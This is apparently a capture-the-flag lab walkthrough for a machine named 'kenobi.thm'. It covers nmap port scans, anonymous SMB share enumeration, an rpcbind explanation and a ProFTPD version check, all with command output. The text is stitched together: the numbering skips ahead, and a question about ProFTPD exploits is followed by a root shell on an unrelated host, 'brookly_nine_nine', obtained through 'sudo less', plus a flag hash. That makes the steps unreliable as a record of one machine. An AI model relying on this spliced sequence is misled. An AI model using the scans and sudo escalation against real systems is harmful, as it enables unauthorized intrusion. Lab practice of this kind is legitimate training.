Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
su
echo "10.10.51.196 kenobi.thm" >> /etc/hosts
mkdir thm/kenobi.thm
cd thm/kenobi.thm
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 kenobi.thm
PING kenobi.thm (10.10.51.196) 56(84) bytes of data.
64 bytes from kenobi.thm (10.10.51.196): icmp_seq=1 ttl=63 time=61.3 ms
64 bytes from kenobi.thm (10.10.51.196): icmp_seq=2 ttl=63 time=78.2 ms
64 bytes from kenobi.thm (10.10.51.196): icmp_seq=3 ttl=63 time=75.1 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
2.1 - Scan the machine with nmap, how many ports are open?
nmap --open kenobi.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 12:16 EDT
Nmap scan report for kenobi.thm (10.10.51.196)
Host is up (0.062s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
7 ports are open
Task 3 - Enumerating Samba for shares
Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.
Samba is based on the common client/server protocol of Server Message Block (SMB). SMB is developed only for Windows, without Samba, other computer platforms would be isolated from Windows machines, even if they were part of the same network.
3.1 - How many shares have been found?
nmap -p139,445 -sCV -T4 -A kenobi.thm -oG smb_scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 12:25 EDT
Nmap scan report for kenobi.thm (10.10.51.196)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 2 hops
Service Info: Host: KENOBI
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-06-24T16:25:19
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2023-06-24T11:25:19-05:00
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 60.44 ms 10.9.0.1
2 62.65 ms kenobi.thm (10.10.51.196)
After scan of SMB ports, we need to find shares using nmap script:
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.51.196\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.51.196\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.51.196\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
3 shares
On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.
3.2 - Once you're connected, list the files on the share. What is the file can you see?
smbclient //kenobi.thm/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877092 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (46.1 KiloBytes/sec) (average 46.1 KiloBytes/sec)
smb: \> exit
cat log.txt
3.3 - What port is FTP running on?
21
3.4 - What mount can we see?
Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.
nmap -p21 -sCV kenobi.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 12:53 EDT
Nmap scan report for kenobi.thm (10.10.51.196)
Host is up (0.063s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
Service Info: OS: Unix
1.3.5
We can use searchsploit to find exploits for a particular software version.
Searchsploit is basically just a command line search tool for exploit-db.com.
4.2 - How many exploits are there for the ProFTPd running?
jake@brookly_nine_nine:/$ sudo less /etc/profile
# whoami
root
Now, we're root!
# ls
bin cdrom etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
# cd root
# ls
root.txt
# cat root.txt
🚩 Flag 2 (root.txt)
63a9f0ea7bb98050796b649e85481845
ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.
